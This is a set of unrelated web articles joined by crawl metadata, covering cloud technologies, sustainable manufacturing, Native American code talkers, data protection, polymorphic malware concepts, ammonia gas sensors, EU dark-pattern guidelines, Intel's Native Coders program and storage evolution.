Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today | <urn:uuid:a0c1f59e-96e1-44f9-9de2-b1cf0cbdaf79> | CC-MAIN-2022-40 | https://www.dpstele.com/blog/monitoring-environmental-conditions-best-practices.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00565.warc.gz | en | 0.943151 | 2,104 | 2.71875 | 3 |
The advance of emerging technologies enabled by cloud computing has been dizzying over the last several years.
In some cases, these new technologies have been created by cloud companies specifically for the cloud; for instance, serverless. In other cases, a technology has advanced by its close relationship with the cloud; for instance, machine learning and artificial intelligence.
In either case, these emerging technologies are changing not just cloud, but the larger world of enterprise computing – not to mention sectors ranging from retail to media to pharmaceutical.
Top Emerging Technologies in Cloud Computing
These emerging technologies – either cloud-based or highly interoperable with the cloud – offer enormous promise, yet they have also contributed to a growing complexity in cloud computing.
In the spring of 2014, container technology burst upon the scene; the tech world was abuzz with how containers make software development faster and more nimble.
Containers weren’t actually new, but a little known outfit named Docker made them easy to use.
Unlike the virtual machine popularized by VMware, which has to hold the entire OS, containers wrap a piece of software in a capsule that’s like a lightweight “computing suitcase.” The container carries the software itself and only the bare essentials needed (libraries and configuration files) to travel among computing environments.
Adoption has been fast for such a new technology. The Rightscale State of the Cloud 2019 report indicates that 66 percent of enterprises have adopted containers. Similarly, 60 percent have adopted Kubernetes, the container management system developed by Google.
Given the myriad elements of a cloud environment, it’s no surprise that it’s producing a wide variety of emerging technologies.
Prior to AWS’s introduction of serverless architecture in 2014, cloud customers estimated – guessed – what level of computing resources they’d need to provision, and paid accordingly. With serverless, customers are charged only for that they actually use.
More significant, with serverless, the cloud provider handles the infrastructure headaches of maintenance and scaling, making it easier and faster for customers (particularly developers) to build out their cloud-based systems.
Serverless, also known as function as a service, allows the cloud world to spin much faster and more efficiently.
Updating large, complex pieces of software can be a slow and cumbersome process. Enter microservices, which started gaining buzz around 2012.
Microservices breaks these unwieldy monolithic apps into a number of smaller, joined services, or “modules.” It uses a modular approach, with small teams updating modules as needed, independent of the full hulking application. (Anecdotally, industry lore says that the module should be small enough so a team that can be fed by two pizzas can update it.)
Microservices enables continuous delivery of freshly updated software. Like serverless, it allows app development to move at the faster speed necessitated by the cloud era.
Speaking of continuous delivery, DevOps is focused on exactly that: CI/CD ( continuous integration / continuous delivery). DevOps, which started gaining serious momentum around 2012, is as much of a cultural shift as a technology. Its aim is to speed software develop by getting two groups with very different worldviews to speak to one another: developers and operations managers.
Developers are often artists at heart; they create things. Operations managers are typically the opposite; they embrace metrics and spreadsheets. But if the dev team and the ops team can work together (hence, “DevOps”) the all-important software updates can flow out fast enough to gain competitive advantage.
Internet of Things (IoT)
In the cloud era, everything – everything – can be connected to the Internet. From your wristwatch (Fitbit, Apple watch) to your home controls (Nest) to self-driving cars to surveillance camera. This vast network of sensors – the Internet of Things – generates ginormous oceans of data.
IoT exists separately from cloud computing, but two factors inextricably link the two technologies.
First, as is true with many new technologies, with IoT businesses wondered: How are we going to buy it? We can’t build it all from scratch – it’s too expensive and complicated. And as is often the case, with IoT the answer is: through the cloud. Each major cloud platform offers an IoT solution.
Moreover, the key question about IoT, also known as “edge computing,” is: where will we process all that data? For many businesses, the answer is “in our cloud platform.” Cloud-based data analytics, powered by the cloud providers’ hyperscaling servers, offer superior data crunching.
Artificial intelligence is the big one, the emerging technology that will ultimately do the most to profoundly shape the future. With its promise of software that learns independent of human assistance, AI is the great tool whose august potential dwarfs all other tools.
And again, while AI certainly exists separately from cloud, AI is far too complex for businesses to build themselves. So businesses look to cloud companies for their AI solutions, including machine learning and deep learning tools.
In the early days of cloud, cloud’s ability to offer basic compute and storage was the great democratizer. Cloud providers enabled small-fry companies to “rent a datacenter” and so compete with big whales. As cloud matures, it is cloud-based AI that is enabling the next generation of under-funded visionaries to realize their vision – just like deep-pocketed outfits. | <urn:uuid:5df640bb-e1b0-431b-bc8a-ffe533a184d4> | CC-MAIN-2022-40 | https://www.datamation.com/cloud/top-six-emerging-technologies-in-cloud-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00565.warc.gz | en | 0.938816 | 1,170 | 2.6875 | 3 |
“Significant change is afoot [in manufacturing] and it necessitates bigger thinking. Those unprepared may find themselves being left behind.”- 2021 Deloitte report, Sustainable Manufacturing: From Vision to Action
Sustainability is gaining hold in the manufacturing industry. Customers are looking for products and partners who follow eco-friendly practices, adopt green policies, and share a commitment to sustainability.
Another critical reason for manufacturers to undertake initiatives in sustainability and include them as a key goal in their strategy and operation is substantial financial benefits and worldwide competitiveness.
Related Reading: 6 Technologies Driving Sustainability in 2022
However, implementing sustainable manufacturing production comes with issues and challenges that could be overcome by adopting modern technologies. Product development merged with digital technologies helps to reap the true potential of sustainable manufacturing and achieve environmental conservation goals.
What is Sustainable Manufacturing?
Sustainable manufacturing is a process of creating products with minimal negative environmental impact. It is a strategic method to “meet the needs of the present, without compromising the capability of the future generation to meet theirs.”1 The prime objective of sustainable manufacturing is to conserve energy and natural resources while minimizing waste.
The manufacturing industry contributes significantly to greenhouse gas emissions and uses water and energy excessively. Hence it is also the most targeted industry in sense of sustainability.
Smart, efficient, and low-impact manufacturing practices also give a sustainable leg up to the manufacturer during the supplier evaluation process as it distinguishes them from the rest and positions them to stay ahead of the competition.
Virtually all of the world’s largest companies now issue a sustainability report and set goals; more than 2,000 companies have set a science-based carbon target, and about one-third of Europe’s largest public companies have pledged to reach net zero by 2050.2
Technology Supporting Sustainability in Manufacturing & Distribution
So what’s making sustainability so easy to adopt? The straightforward answer – Modern technologies. Here we have put together a list of modern technologies that are making manufacturing processes sustainable.
- Additive Manufacturing
Subtractive manufacturing, also called traditional manufacturing, includes drilling, cutting, and grinding processes. These processes generate a large amount of waste in form of chips and scraps affecting economic and environmental sustainability. Whereas, additive manufacturing represents a more sustainable means of production.
Additive manufacturing eliminates the use of excess materials and unnecessary waste from the outset through 3D printing. It not only saves time but also provides end-of-product-life-cycle solutions enabling more environmentally benign practices. Additive manufacturing also allows for resources efficient material – via recycling.
According to Eduard Hryha, researcher and project manager for the new Centre for Additive Manufacture – Metal (CAM2) at the Chalmer’s University of Technology in Sweden – Additive manufacturing might play a significant role In the long term to reach the United Nation’s Sustainable Development Goals (SDG).3
To quote him, “To reach the climate goals, we must make significant changes to the way we manufacture products and additive manufacturing is one of those revolutionary methods.”
- Big Data and Digital Twins
Big data has already become a powerful tool for monitoring and controlling sustainable development in the manufacturing industry. It helps to understand trends, preferences, and correlations on the larger data sets for effective decision-making.
Especially in smart factories where data is captured from the sensors during the production activities and can be analyzed for predictive maintenance operations. Other benefits that big data offers are process optimization, real-time monitoring, production efficiency, and management automation.
According to the ‘Digital Twins: Adding Intelligence to the Real World’ report from the Capgemini Research Institute, 60% of organizations across major sectors are leaning on digital twins to fulfill their sustainability agenda.4
Digital twins help to improve product design and manufacturing by serving as a real-time digital counterpart of physical entities in a system. It enables product designers to embed and follow circular economy principles throughout each stage of design.
- Artificial Intelligence and Machine Learning
AI and Machine Learning generate a lot of opportunities for sustainable manufacturing. It creates an efficient and transparent supply chain which significantly decreases operational friction. It also evaluates the component images in ongoing production lines and instantly identifies even the slightest deviation from the standards in real-time.
According to Deloitte’s survey on AI adoption in manufacturing, 93 percent of companies believe AI will be a pivotal technology to drive growth and innovation in the sector.5 AI continually learns and suggests optimal operation parameters for production runs, indicating how much you could save in energy and carbon consumption. It will also recommend adjustments to help you achieve the highest efficiency level.
AI-enabled computer vision systems and smart cameras can also help improve the safety of workers. It can inspect if the workers are wearing safety equipment and complying with safety rules improving the social sustainability of the manufacturing business.
- Internet of Things (IoT)
The Internet of things (IoT) plays an important role as a key enabler for sustainable manufacturing. Deployment of a large number of sensors and advanced controls makes manufacturing cost-effective and helps to achieve extensive environmental goals.
Related Reading: How is Industrial IoT Making Manufacturing Safe?
Manufacturers can collect a more significant amount of data and convert them into valuable business information to improve product quality, and increase production efficiency and resource utilization.
One of the findings revealed that 94% of key decision-makers across 12 industrial segments agree that Industrial IoT can improve overall sustainability. Moreover, 72% are looking to increase spending on this technology due to its impact on sustainability.6
IoT-based solutions also help manufacturers optimize their entire energy system. Through real-time data collection and data processing, manufacturers will be able to quickly identify irregularities and patterns and take suitable measures right away.
- Cloud Computing and Manufacturing
As manufacturing becomes more integrated and complex, cloud computing will be considered a key enabler of sustainable manufacturing. It offers advantages like the computational power required to apply ML, AI approaches, and other smart technologies in Industry 4.0.
Free Download: Cloud and Infrastructure infographic
Manufacturers can make more intelligent decisions to adopt the most sustainable and robust manufacturing route using cloud technologies. It also helps to power core capabilities like automation to reduce production time, avoid over or underproduction and take measures to reduce energy consumption.
- Augmented and Virtual Reality
Manufacturers looking to embrace sustainability should invest in Augmented Reality technology. It has made the training process a lot easier and faster, improved the operator’s performance, and enhanced the throughput.
AR can also provide instructions to maintain and change machine setup for assembly processes, decreasing the amount of time it takes to understand instructions and improving workflow and productivity.
Using real-time visuals, manufacturers can make products come to life. Visualized workflows make processes much clearer to troubleshoot problems, fix them and prevent them from happening in the future.
- Blockchain Technology
In the traditional manufacturing supply chain, the information is usually managed and stored in a centralized location which increases the risk of losing data. The whole system could become vulnerable to errors or attacks, reducing trust between supply chain parties. This approach also affects reliability and transparency in the supply chain processes.
The blockchain in the manufacturing market is expected to reach $778.05 million in 2026. Blockchain overcomes these barriers by building a reliable, transparent, traceable, and secure supply chain.7 This improves trust between stakeholders, reduces transaction costs, optimizes manufacturing processes, and minimizes production time.
- Robotic Process Automation
RPA and sustainability are aligned in the manufacturing sector. It is the perfect technology companion to accelerate sustainability, eliminate waste and bolster a company’s bottom line. Though robots have been helping manufacturers to streamline assembly lines, they still struggle effectively manage operational or backend processes.
Free Download: Robotic Process Automation Infographic
RPA analyzes existing manufacturing processes for opportunities to improve efficiency and accuracy. It offers companies improved agility in operations across the entire value chain. It helps them to operate time-intensive processes like procurement, inventory management, and payment processing while strategizing cost reduction, innovating business operations, and keeping up with regulations.
Companies implementing RPA for manufacturing activities experience an increase in accuracy, flexibility, and productivity decreasing energy consumption, waste, and workplace injury. Surveys show that 43% of manufacturers already use robotic process automation, while a further 43% plan to deploy RPA initiatives.8
Transform to Low Carbon Future with iLink Digital
Together with our partners, we help our clients reinvent their businesses at scale, creating value and sustainable impact. Our sustainability framework helps speed up each stage of the net zero journeys including design-related transformation, and business model adaptation.
From strategy to execution our portfolio of services is designed to help you tackle your greatest sustainability challenges and realize the competitive advantage and impact at scale that sustainability brings. We embed sustainability into everything we do!
Check out our service portfolio to discuss how a sustainable manufacturing solution can help your business. | <urn:uuid:9be00158-766c-4be1-8dc0-1177c8741d9d> | CC-MAIN-2022-40 | https://www.ilink-digital.com/services/cloud-consulting-services/cloud_blog/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00565.warc.gz | en | 0.916831 | 2,040 | 3.359375 | 3 |
Native American Code Talkers
The term Native American Code Talkers refers to the many people from indigenous communities within the US who worked with the US military to serve as ciphers.
Code talkers used their knowledge of their largely-unknown native languages as the foundation for encrypting verbal messages, strengthening encryption and making it agile on the battlefield. They used a simple substitution cipher to replace letters of the English alphabet with a native word to represent it, and they used simple translation from English to the native language and back. For the latter, descriptive words were substituted since no native terms applied. In World War II the word Britain became “between two waters”, fighter aircraft became “hummingbird”, and battleships were called “whales”.
An estimated 400-500 Native Americans worked with the United States Marine Corps encoding and decoding message as their primary responsibility. The dominant language for USMC code talkers during WWII was Navajo, whole personnel were deployed alongside convention communications personnel in the Pacific theatre. In WWII — across the Pacific, North African, and European theatres — the US Army also deployed Native American and in general other code talkers of lesser-known languages (e.g. Basques of San Francisco, CA, in the USMC) have answered the call to serve in this way. For their part, members of the Cherokee and Choctaw tribes pioneered code talking during World War at or around the time of the Meuse-Argonne Offensive, Western Front, 1918.
“Native American Code Talkers were heroes who lent their talents toward the cause of US and world freedom by serving with the US military. They used lesser-known languages such as Navajo which baffled the enemies’ efforts to eavesdrop on frontline and other communications.” | <urn:uuid:9f1cb6d6-38f3-48f0-af44-df66ebf9604e> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/native-american-code-talkers | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00565.warc.gz | en | 0.9679 | 369 | 4.40625 | 4 |
These data can easily be exploited to harm you, and that’s especially dangerous for vulnerable individuals and communities, such as journalists, activists, human rights defenders, and members of oppressed and marginalized groups. That is why these data must be strictly protected.
Why is the regulation on data protection important?
The GDPR has revolutionized the way data protection and privacy is viewed. The Regulation mirrors the GDPR because it makes businesses or organizations liable if they or their third-party contractors handle citizens’ or residents’ personal data without complying with the privacy laws.
What is General data protection Regulation and why is it important?
The purpose of the GDPR is to impose a uniform data security law on all EU members, so that each member state no longer needs to write its own data protection laws and laws are consistent across the entire EU.
Why is a regulation data protection important and why is it important to keep personal information private?
The Importance of Data Privacy
Keeping private data and sensitive information safe is paramount. … The lack of access control regarding personal information can put individuals at risk for fraud and identity theft. Additionally, a data breach at the government level may risk the security of entire countries.
Why is data protection important in research?
Research data planning is an important part of ensuring your research is conducted in a way that is compliant with data protection, freedom of information and record management requirements. The Research Data Service (part of Information Services) offer advice and tools to help you manage research data.
What function do regulations like the general data protection regulation?
What function do regulations like the General Data Protection Regulation (GDPR) serve? to ensure companies are safeguarding customer data according to a set of minimum standards. to allow government agencies access to companies’ customer data in the case of criminal proceedings.
What function do regulations like the General Data Protection Regulation serve?
Answer: This regulation is called the EU General Data Protection Regulation or GDPR, and is aimed at guiding and regulating the way companies across the world will handle their customers’ personal information and creating strengthened and unified data protection for all individuals within the EU.
Do I need to comply with GDPR?
Any company that stores or processes personal information about EU citizens within EU states must comply with the GDPR, even if they do not have a business presence within the EU. Specific criteria for companies required to comply are: A presence in an EU country.
Why is it important to keep personal data confidential?
Data privacy has always been important. … A single company may possess the personal information of millions of customers—data that it needs to keep private so that customers’ identities stay as safe and protected as possible, and the company’s reputation remains untarnished.
Its main purpose is to protect and promote the interests of patients and the public, while also making sure that confidential patient information can be used when it is appropriate, for purposes beyond individual care.
Why is data protection an ethical issue?
Data protection is an ethical issue. It involves respect for individuals and their rights regarding privacy and the use of information about them. … Data protection issues are raised formally during the ethics process.
How do you maintain data protection in research?
Keep data secure
Use a computing services server to store data wherever possible. Don’t put the data onto a mobile device unless it is secure – password protected and, where appropriate, encrypted. Restrict access to data and maintain confidentiality by: only allowing other staff to access the data if necessary.
What does data protection mean in research?
The Data Protection legislation covers how personal data should be processed. … Researchers have to consider how they manage personal data from the point they start collecting it, through storage to disposal. | <urn:uuid:e4e8e734-33bf-40d1-8f4c-1490d3fbe6a6> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/why-do-we-need-data-protection-regulation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00565.warc.gz | en | 0.916946 | 765 | 2.90625 | 3 |
Creator: University of Houston
Category: Software > Computer Software > Educational Software
Topic: Language Learning, Learning English
Tag: culture, theoretical, world
Availability: In stock
Price: USD 49.00
This is a six-week course providing a historical overview of the American Deaf community and its evolving culture. Theoretical frameworks from sociology are explored.
Deafness as a culture and not a disability is explained as participants are guided into the world of Deaf culture. | <urn:uuid:827476b1-ee9e-4cb2-aacc-4e8e24c1087f> | CC-MAIN-2022-40 | https://datafloq.com/course/american-deaf-culture/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00565.warc.gz | en | 0.904058 | 101 | 2.515625 | 3 |
Metamorphic and Polymorphic malware
Can you imagine that a piece of malware code, can change its shape and signature each time it appears, to make it extremely hard for signature based antivirus to detect them ?! This is called polymorphic malware and metamorphic malware.
In its annual threat report, security firm Sophos said that the majority of samples it observes are unique attacks associated with polymorphic and metamorphic malware.
Although the idea of mutating malware sounds quite scary, it’s actually been used by malicious hackers since the early 1990s but they are getting very advanced. Usually antivirus solutions use signatures to identify malware by comparing each file with their database of malware signatures. If the file under investigation has the a signature that looks like on of the signatures in their database, then it will detect the infection.
Crackers are getting smarter. When you visit a suspicious web site, you will get infected with a malware with a certain shape and signature. When another person visits the same site, he will get infected with the same malware but with different shape and signature. Each time someone downloads that malware, a new shape is generated for the same malware automatically. Actually refreshing that page will generate new shapes for the new malware !. This makes it so difficult for signature based antivirus solutions to handle.
Not only each download for the same malware will have different shape, the same malware on a certain machine will keep changing its shape to avoid detection. This is how sophisticated polymorphic and metamorphic malware can be
It is important to note that although the malware changed (“morphs”) its shape for each iteration and each download, the function that it performs remains the same (it is like it changes its appearance, but the bad code inside it still doing the same damage).
This is an example of malware (codenamed Shylock) that once appear with file name and description, and with time it appears as different file completely, changing by that its signature:
This type of malware is completely rewritten with each iteration but still each version for each iteration functions the same way. The longer the malware stays in a computer, the more iterations and versions it will produce and the more sophisticated the iterations are.
The technologies used by metamorphic malware is so sophisticated and complex. Metamorphic malware is more difficult to detect than polymorphic malware. Some of the technologies used for such malware include register renaming, code permutation, code expansion, code shrinking and garbage code insertion.
it is also a type of malware that changes its shape and signature. It has usually two parts, one of them changes its shape, while the other part remains the same, which makes it easier to detect than metamorphic malware.
Usually this type of malware consists of two parts :
- Code that is used to decrypt and encrypt the other part (usually called VDR : virus decryption routine). This part does not change its shape.
- The core malware code that changes its shape (usually called EVB : encrypted virus body).
When an infected application launches, the VDR decrypt the encrypted virus body (EVB) so it can execute and then re-encrypt it again. Usually the malware writer will use randomly generated encryption key to be used by the VDR so for each malware download, so that we will get completely different EVB encrypted virus body. | <urn:uuid:dac6903b-ad05-4e1b-9377-429906ed7147> | CC-MAIN-2022-40 | https://blog.ahasayen.com/metamorphic-and-polymorphic-malware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00765.warc.gz | en | 0.93087 | 701 | 2.609375 | 3 |
Ammonia gas is a compound of nitrogen and hydrogen and it has a pungent smell and is colourless. It is naturally found in the environment and can also be chemically produced. It is most widely used in fertilizers, refrigerating systems, household cleaners, industrial cleansing agents, and others. Ammonia is flammable in nature and on heating, ammonia containers can explode.
Ammonia gas sensors are being widely used for controlling vehicular and industrial emissions, and for environmental monitoring. Stringent government regulations regarding reduced emissions and pollution control make the deployment of ammonia gas sensors very important. The growing technological advancement in security systems for detecting the presence of various gases is driving the growth of the global market for ammonia gas sensors.
The global ammonia gas sensor market is expected to grow at a CAGR 6% during the forecast period. The demand for ammonia has increased owing to the increased demand for the supply of low-cost nitrogen for the production of nitric acid. This, in turn, has accelerated the demand for ammonia gas sensors. In addition to this, the use of ammonia in agriculture is creating risks for humans and the environment. It can cause various health-related issues and may also result in death. Thus, there is a need for using ammonia gas sensors so that people can know the level of ammonia in their surrounding environment and can take preventive measures accordingly.
The global ammonia gas market is segmented on the basis of product type and application. Based on the product type, it is categorized as fixed mount type and portable type. The portable type have advantages over other as, it can be moved and carried anywhere anytime. The application segment is segmented as agriculture, automotive, commercial, industrial, and others. The automotive sector is experiencing rapid growth due to urbanization, which will result in high pollution emissions, thereby boosting the demand for ammonia gas sensors.
Get a sample copy at: https://www.alltheresearch.com/sample-request/37
The ammonia gas sensor market is segmented on the basis of regions as North America, Europe, Asia Pacific, Latin America and Middle East Africa. The market for ammonia sensors is expected to witness a significant growth in the Asia Pacific region during the forecast period. The rising number of manufacturing hubs and growing industrialization in countries such as China and India in the APAC region are driving the demand for ammonia gas sensors. There are many manufacturers of ammonia gas sensors in the market such as Aeroqual, Denso, Direct Industry, FIS Inc, Gasvigil Technologies Pvt Ltd., Industrial Scientific Corporation, Invest Electronics Ltd, Sensidyne, and others.
AllTheResearch was formed with the aim of making market research a significant tool for managing breakthroughs in the industry. As a leading market research provider, the firm empowers its global clients with business-critical research solutions. The outcome of our study of numerous companies that rely on market research and consulting data for their decision-making made us realise, that it’s not just sheer data-points, but the right analysis that creates a difference.
For all your Research needs, reach out to us at:
Address:39180 Liberty Street Suite 110, Fremont, CA 94538, USA | <urn:uuid:0c5dd1b6-7760-4d51-a7f6-73e3878569ea> | CC-MAIN-2022-40 | https://www.alltheresearch.com/press-release/ammonia-gas-sensor-market-is-expected-to-grow-at-a-cagr-6-during-the-forecast-period | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00765.warc.gz | en | 0.93771 | 684 | 2.703125 | 3 |
New guidelines are supposed to help national authorities spot and regulate design-based manipulations.
The European Union's privacy watchdog, the European Data Protection Board (EDPB), adopted a set of guidelines to limit 'dark pattern' infringements on social media.
'Dark patterns' is a technique designers use to coerce users into doing what the website wants. For example, providing privacy options for web cookies, with one option being brighter and worded more positively.
EDPB aims to offer practical recommendations to designers and users of social media on how to assess and avoid 'dark patterns' in various interfaces, especially when misleading design collides with EU's strict privacy regulation, GDPR.
According to the EDPB, 'dark patterns' may 'cause users to make unintended, unwilling, and potentially harmful decisions regarding the processing of their personal data.'
With design working against users' interests, it's unlikely an average person will make the choices that are best suited for them.
"The guidelines give concrete examples of dark pattern types, present best practices for different use cases, and contain specific recommendations for designers of user interfaces that facilitate the effective implementation of the GDPR," EDPB claims.
Several US states, most notably California and Washington, added provisions on the use of 'dark patterns' in their respective privacy bills.
The misuse of dark patterns wary anywhere from annoying to downright dangerous. In some cases, the 'pattern' might lead a user to miss the 'x' on a pop-up ad, while in other cases, users commit to contracts over services they thought were free.
More from Cybernews:
Subscribe to our newsletter | <urn:uuid:1e33c8c7-79e4-41cb-b8a1-3ac8f0a52885> | CC-MAIN-2022-40 | https://cybernews.com/news/europeans-push-to-curb-dark-patterns-in-social-media/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00765.warc.gz | en | 0.906569 | 335 | 2.765625 | 3 |
Since 2015, Intel’s Native Coders initiative has provided pathways to computer science for hundreds of Native American high school students through a culturally sensitive curriculum that bridges cutting-edge technology and endangered traditions.
The initiative began as part of Intel’s broader goal to achieve full representation of women and underrepresented minorities in its U.S. workforce by 2020 – which the chip maker achieved last October, two years ahead of schedule. That means that the percentage of women and underrepresented minorities matches the talent pool available for skilled workers in the U.S, according to Intel.
Native Coders launched in 2015 in the Navajo Nation in Arizona at three Navajo high schools. A computer science curriculum was added to the schools’ coursework, and Intel funded the addition of computer science educators and a full computer lab at each site, says Jolene Begay, an engineering technician at Intel who played an integral role in developing the Native Coders program.
Begay herself is Navajo and grew up on a reservation. She knew from the beginning there would be unique challenges bridging the gaps between corporate culture and Navajo culture.
“The Native Coders initiative is very special to me because I’m from that tribe, and technology and Intel have played a huge role in my career. Growing up, I didn’t come from a family of engineers, and I didn’t have that exposure to the field – I wanted to be involved in this because I wanted to develop a pathway for others into this industry,” Begay says. “Because of our history, we’re very protective of our culture, so bringing a big corporation onto the reservation was a huge hurdle. I went, first, to speak to the tribal leaders and talked about the positives and the opportunities available, and because it was brought from someone in the community, it was more easily acceptable.”
Combining tech skills with Navajo culture
Navajo culture is based around family and community and preserving that cultural identity, Begay says, but Navajo culture and technology don’t have to be mutually exclusive.
“A career in computer science offers opportunities to both stay at home and preserve culture while making an impact on the larger world – for these kids, if they have a laptop and the internet, they can be entrepreneurs, they can work remotely, they can help to expand access and opportunities to others in their community,” she says.
In addition to leveraging Begay’s connections with Navajo tribal leaders, Intel approached development, strategy and launch of the program differently by partnering with other organizations such as American Indian Science and Education Society (AISES) and aligning curriculum and strategy with the White House CS4All initiative in 2016, says Rhonda James, senior program manager and head of global diversity and inclusion programs at Intel.
“We didn’t want to do what companies typically do, where we build the strategy, create products and programs, and then onboard everyone else – the top-down approach,” James says. “We wanted to involve the community from the very beginning and hear from them about their challenges and opportunities, so we held a ‘convening.’ We had tribal leaders, non-profits focused on Native Americans; we had students, Intel employees – all sorts of people – come together to talk about the issues and opportunities and what’s next. We brought in AISES, which has an existing curriculum that we integrated and that meets Arizona state educational codes, we brought in the National Center for Women in Technology (NCWIT), and together with all these partners and all this feedback, we created this program.”
The program includes general, standardized curriculum that all students can relate to, but is also highly customizable for different tribal needs, James says. For example, Navajo students can use their technology skills to design weaving patterns and learn how technology can impact design and color process for traditional textiles, says Begay.
“Weaving is very traditional in our culture. Creating the patterns, dying and spinning the wool – many of these aspects of creating textiles have traditional cultural processes and meaning. But showing students how math, engineering, [and] computer science can be leveraged in these traditional arts is building a bridge between our traditions and future innovation,” Begay says.
With 573 tribal communities within the U.S., the curriculum developed for the Native Coders initiative can be customized so that all native communities can align their traditions and cultures with STEM, Begay says, and find new ways to integrate the two.
The program is now entering its fourth year, and 2019 will see the Native Coders’ initiatives first graduates this spring, says Begay.
“When we first kicked off, we opened up the program only to high school freshman, so we haven’t yet had a class go through the full three-year program. This year will be our first! We will then have 439 students who’ve completed this program,” she says.
In addition, Intel has launched a $1.37 million scholarship program for Native American students to pursue their undergraduate and graduate degrees in a STEM field, says James, and Intel’s leadership has been touting the program to other industry partners.
“We’ve been encouraging other partners and colleagues in the industry to pursue initiatives like this, but the challenge is in the numbers,” James says. “The representation of Native Americans in STEM is less than 1 percent – what we hear a lot is, ‘Oh, we’ll do a low-touch model because the numbers are so small,’ or ‘Well, we don’t have any Native Americans at our company.’ But regardless of those numbers, this is a valid and valued program, and we want these communities to know that we value them and want to see greater representation! If a company doesn’t have that representation, that isn’t a reason to ignore certain groups – that’s a challenge and an opportunity,” James says. | <urn:uuid:7f60554f-9d58-40da-acb6-ddf18c8f272b> | CC-MAIN-2022-40 | https://www.cio.com/article/219754/intels-native-coders-program-offers-pathway-to-stem-for-native-american-students.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00765.warc.gz | en | 0.960165 | 1,255 | 2.796875 | 3 |
4 Ways Storage Technologies Have Evolved
Like many technologies these days, storage has come a long way. We miss you, floppy disks! Look no further than these four interesting and important ways cloud storage technologies have evolved in the past decade.
The trends in storage we'll highlight are interrelated. They are all consequences, direct or indirect, of Moore's Law: Gordon Moore's observation that the count of transistors on a chip doubled every couple of years, on and on for decades. The exponential growth affected processor power, but also storage density.
Data grows exponentially
"Between the dawn of civilization and 2003, we only created five exabytes; now we're creating that amount every two days. By 2020, that figure is predicted to sit at 53 zettabytes (53 trillion gigabytes) – an increase of 50 times." —Hal Varian, Chief Economist at Google.
The volume of digital data in the world is growing exponentially. Nowadays, most human activities, and nearly all business activities, are mediated by — or at least accompanied by — computers. In the process, individuals and organizations are generating large volumes of data, and we've grown more and more dependent on that data.
From smartphones, to point-of-sale systems, to security cameras, to factory robots, and beyond, there are billions of devices generating and capturing data, which must be transmitted and stored. This need is in a feedback loop with the other trends in storage technology below.
Storage gets denser, cheaper, and more invisible
For many years, consumer storage devices, like the spinning-disk and solid-state storage that an ordinary person might buy, has mushroomed enormously in capacity while becoming remarkably cheaper.
The effects of Moore's Law can be seen in the long-termcost trend for memory. A megabyte cost about $5.2 million in 1960, but by 1980 it was $6500, then $78 in 1990, $1 in 2000, 16 cents in 2005, 2 cents in 2010, and 0.5 cents by 2015 and today. And so thumb drives and external USB drives purchased several years ago now look pathetic in their capacity, as well as absurdly expensive.
While consumer storage products have been exploding, there's been a prodigious growth in the storage we don't see: in the storage all around us, that's tucked away inside smartphones, game consoles, cars, appliances, building systems, industrial systems — and in distant data centers.
Storage moves further away
You likely carry at least few dozen gigabytes around in your pocket (for watching cat videos), but the trend has been for the largest pools of storage to move further and further away from processors — and users.
Storage devices were originally attached directly to a server, or a cluster of servers: Direct Attached Storage (DAS). In data centers, that arrangement has been supplemented by storage accessible over the LAN. Storage devices on the network can be shared, more efficiently utilized, and their capacity scaled; and their data can be more easily shared among servers.
Network Attached Storage (NAS) is a specially-designed file server on an existing LAN. NAS devices export a filesystem view (folders and files) to their clients. Storage Area Networks (SANs) typically use dedicated networking hardware — often fiber channel — to provide a shared path among servers and storage devices. SAN devices usually export a block view (like disk blocks) to their clients. More recent SAN variations can also use vanilla networking, such as high-speed Ethernet (FCoE) or IP (SAN over IP, iSCSI).
Storage in the cloud
As the largest pools of storage move further away, transitioning to the cloud is the next step.
Cloud-based storage provides enormous volumes of storage managed and monitored by a cloud provider that guarantees a degree of availability and durability hard to achieve on your own. Sharing storage with other customers generally is a win in both cost and agility.
The cloud is founded on virtualization. Cloud storage is implemented on physical devices in multiple locations but aggregated into pools that are invisibly carved up among customers and hiding the particulars of the underlying hardware. The cloud provider gives you a simplified management interface and an automated process to fulfill requests, so you can rapidly create and provision virtual resources from the shared pools, paying as you go.
Object-based storage is a storage technology particularly suited to the immense distributed volume of data in the cloud. Rather than appearing to be disk blocks (like SAN) or a filesystem of folders and files (like NAS), object storage exposes binary objects: blobs that contain a file's contents, its metadata (like owner, date, etc.), and other attributes. The objects are stored in a flat list, indexed by object IDs (OIDs) that are derived from the file's contents and other attributes. The flat address space of OIDs works well for scalability and geographic distribution.
Amazon's cloud offering, Amazon Web Services (AWS), offers a variety of storage options, and we can see the storage technologies above reflected there. Elastic Block Storage is block oriented, like SAN. Elastic File System is file system-oriented, like NAS. And Simple Storage Service (S3) is an object-based storage system.
Evolution of storage
Storage in the cloud will continue to be an occasion for innovation. Big data science and artificial intelligence both need massively parallel processing of huge volumes of data, and cloud services will need to grow to support that rapid change.
